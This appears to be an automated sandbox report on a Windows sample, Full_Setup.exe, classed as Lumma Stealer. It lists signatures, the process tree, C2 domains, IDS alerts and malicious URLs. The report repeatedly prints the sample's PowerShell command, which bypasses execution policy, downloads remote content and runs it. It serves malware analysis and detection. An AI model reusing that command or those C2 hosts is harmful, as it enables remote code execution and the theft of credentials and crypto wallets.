Edit tour

Windows Analysis Report
Full_Setup.exe

Overview

General Information

Sample name:	Full_Setup.exe
Analysis ID:	1584499
MD5:	7d0c49430b8eec968a41dd052d0830f6
SHA1:	002790896e4b4fc11a52c7fc1f60c6b23eeb9310
SHA256:	5076058e7be4c726282ad8240653ce29d9719c77a2367427024923d1ca23654f
Tags:	exeLummaStealeruser-aachum
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Found direct / indirect Syscall (likely to bypass EDR)

Found many strings related to Crypto-Wallets (likely being stolen)

Loading BitLocker PowerShell Module

LummaC encrypted strings found

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample or dropped binary is a compiled AutoHotkey binary

Sigma detected: PowerShell Download and Execution Cradles

Sigma detected: Suspicious PowerShell Parameter Substring

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries keyboard layouts

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: PowerShell Web Download

Sigma detected: Usage Of Web Request Commands And Cmdlets

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Full_Setup.exe (PID: 7048 cmdline: "C:\Users\user\Desktop\Full_Setup.exe" MD5: 7D0C49430B8EEC968A41DD052D0830F6)

powershell.exe (PID: 6524 cmdline: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; z MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

8R65FTCZQK06W5IFC.exe (PID: 3704 cmdline: "C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe" MD5: 51F99EDDD33CC04FB0F55F873B76D907)

8R65FTCZQK06W5IFC.tmp (PID: 4956 cmdline: "C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp" /SL5="$2042E,7785838,845824,C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe" MD5: F809F51E678B7F2E388F8C969EF902C8)

8R65FTCZQK06W5IFC.exe (PID: 1668 cmdline: "C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe" /VERYSILENT MD5: 51F99EDDD33CC04FB0F55F873B76D907)

8R65FTCZQK06W5IFC.tmp (PID: 4904 cmdline: "C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp" /SL5="$90296,7785838,845824,C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe" /VERYSILENT MD5: F809F51E678B7F2E388F8C969EF902C8)

timeout.exe (PID: 3804 cmdline: "timeout" 9 MD5: 100065E21CFBBDE57CBA2838921F84D6)

conhost.exe (PID: 6160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1696 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 6824 cmdline: tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 6884 cmdline: find /I "wrsa.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

cmd.exe (PID: 7044 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 5432 cmdline: tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 2672 cmdline: find /I "opssvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

cmd.exe (PID: 5936 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 4040 cmdline: tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 3940 cmdline: find /I "avastui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

cmd.exe (PID: 2992 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 4412 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 6072 cmdline: find /I "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

cmd.exe (PID: 6448 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 5676 cmdline: tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 5348 cmdline: find /I "nswscsvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

cmd.exe (PID: 1368 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 5376 cmdline: tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 772 cmdline: find /I "sophoshealth.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

BrightLib.exe (PID: 2024 cmdline: "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe" MD5: 6A8860A8150021B2D5B9BB707DE4FA37)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["noisycuttej.shop", "nearycrepso.shop", "framekgirus.shop", "cloudewahsj.shop", "tirepublicerj.shop", "aloofysofar.click", "rabidcowse.shop", "abruptyopsn.shop", "wholersorie.shop"], "Build id": "hRjzG3--ZINA"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2020014430.00000000029A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x53cfb:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Process Memory Space: Full_Setup.exe PID: 7048	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Full_Setup.exe PID: 7048	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Full_Setup.exe PID: 7048	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: PowerShell Download and Execution Cradles

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; z, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; z, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Full_Setup.exe", ParentImage: C:\Users\user\Desktop\Full_Setup.exe, ParentProcessId: 7048, ParentProcessName: Full_Setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; z, ProcessId: 6524, ProcessName: powershell.exe

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; z, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; z, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Full_Setup.exe", ParentImage: C:\Users\user\Desktop\Full_Setup.exe, ParentProcessId: 7048, ParentProcessName: Full_Setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; z, ProcessId: 6524, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; z, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; z, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Full_Setup.exe", ParentImage: C:\Users\user\Desktop\Full_Setup.exe, ParentProcessId: 7048, ParentProcessName: Full_Setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; z, ProcessId: 6524, ProcessName: powershell.exe

Sigma detected: PowerShell Web Download

Source: Process started

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; z, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; z, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Full_Setup.exe", ParentImage: C:\Users\user\Desktop\Full_Setup.exe, ParentProcessId: 7048, ParentProcessName: Full_Setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; z, ProcessId: 6524, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; z, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; z, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Full_Setup.exe", ParentImage: C:\Users\user\Desktop\Full_Setup.exe, ParentProcessId: 7048, ParentProcessName: Full_Setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; z, ProcessId: 6524, ProcessName: powershell.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T17:48:11.970405+0100	2028371	3	Unknown Traffic	192.168.2.4	49748	172.67.196.191	443	TCP
2025-01-05T17:48:13.023673+0100	2028371	3	Unknown Traffic	192.168.2.4	49749	172.67.196.191	443	TCP
2025-01-05T17:48:14.916122+0100	2028371	3	Unknown Traffic	192.168.2.4	49750	172.67.196.191	443	TCP
2025-01-05T17:48:16.237327+0100	2028371	3	Unknown Traffic	192.168.2.4	49751	172.67.196.191	443	TCP
2025-01-05T17:48:17.634212+0100	2028371	3	Unknown Traffic	192.168.2.4	49752	172.67.196.191	443	TCP
2025-01-05T17:48:19.368234+0100	2028371	3	Unknown Traffic	192.168.2.4	49753	172.67.196.191	443	TCP
2025-01-05T17:48:23.359449+0100	2028371	3	Unknown Traffic	192.168.2.4	49755	172.67.196.191	443	TCP
2025-01-05T17:48:24.846407+0100	2028371	3	Unknown Traffic	192.168.2.4	49756	172.67.196.191	443	TCP
2025-01-05T17:48:26.997729+0100	2028371	3	Unknown Traffic	192.168.2.4	49757	172.67.196.191	443	TCP
2025-01-05T17:48:28.207148+0100	2028371	3	Unknown Traffic	192.168.2.4	49758	185.161.251.21	443	TCP
2025-01-05T17:48:29.026301+0100	2028371	3	Unknown Traffic	192.168.2.4	49759	104.21.37.128	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T17:48:12.497359+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49748	172.67.196.191	443	TCP
2025-01-05T17:48:13.784825+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49749	172.67.196.191	443	TCP
2025-01-05T17:48:27.432779+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49757	172.67.196.191	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T17:48:12.497359+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49748	172.67.196.191	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T17:48:13.784825+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49749	172.67.196.191	443	TCP

ET MALWARE Possible Windows executable sent when remote host claims to send a Text File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T17:48:29.389777+0100	2008438	1	A Network Trojan was detected	104.21.37.128	443	192.168.2.4	49759	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T17:48:22.771339+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49753	172.67.196.191	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://klipvumisui.shop/~	Avira URL Cloud: Label: malware
Source: https://cegu.shop:443/8574262446/ph.txt	Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/	Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop:443/int_clp_sha.txt	Avira URL Cloud: Label: malware
Source: https://cegu.shop:443/8574262446/ph.txtc	Avira URL Cloud: Label: malware

Found malware configuration

Source: Full_Setup.exe.7048.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["noisycuttej.shop", "nearycrepso.shop", "framekgirus.shop", "cloudewahsj.shop", "tirepublicerj.shop", "aloofysofar.click", "rabidcowse.shop", "abruptyopsn.shop", "wholersorie.shop"], "Build id": "hRjzG3--ZINA"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe

ReversingLabs: Detection: 73%

Multi AV Scanner detection for submitted file

Source: Full_Setup.exe	Virustotal: Detection: 18%			Perma Link
Source: Full_Setup.exe	ReversingLabs: Detection: 26%

Source: Full_Setup.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown	HTTPS traffic detected: 172.67.196.191:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.196.191:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.196.191:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.196.191:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.196.191:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.196.191:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.196.191:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.196.191:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.196.191:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.37.128:443 -> 192.168.2.4:49759 version: TLS 1.2

Source:	Binary string: wntdll.pdbUGP source: BrightLib.exe, 00000024.00000002.2549522831.0000000038680000.00000004.00000800.00020000.00000000.sdmp, BrightLib.exe, 00000024.00000002.2528035200.0000000003635000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: BrightLib.exe, 00000024.00000002.2549522831.0000000038680000.00000004.00000800.00020000.00000000.sdmp, BrightLib.exe, 00000024.00000002.2528035200.0000000003635000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Full_Setup.exe

Directory queried: number of queries: 1001

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49748 -> 172.67.196.191:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49749 -> 172.67.196.191:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49748 -> 172.67.196.191:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49749 -> 172.67.196.191:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49757 -> 172.67.196.191:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49753 -> 172.67.196.191:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: noisycuttej.shop
Source: Malware configuration extractor	URLs: nearycrepso.shop
Source: Malware configuration extractor	URLs: framekgirus.shop
Source: Malware configuration extractor	URLs: cloudewahsj.shop
Source: Malware configuration extractor	URLs: tirepublicerj.shop
Source: Malware configuration extractor	URLs: aloofysofar.click
Source: Malware configuration extractor	URLs: rabidcowse.shop
Source: Malware configuration extractor	URLs: abruptyopsn.shop
Source: Malware configuration extractor	URLs: wholersorie.shop

Source: Joe Sandbox View	IP Address: 104.21.37.128 104.21.37.128
Source: Joe Sandbox View	IP Address: 185.161.251.21 185.161.251.21

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49752 -> 172.67.196.191:443
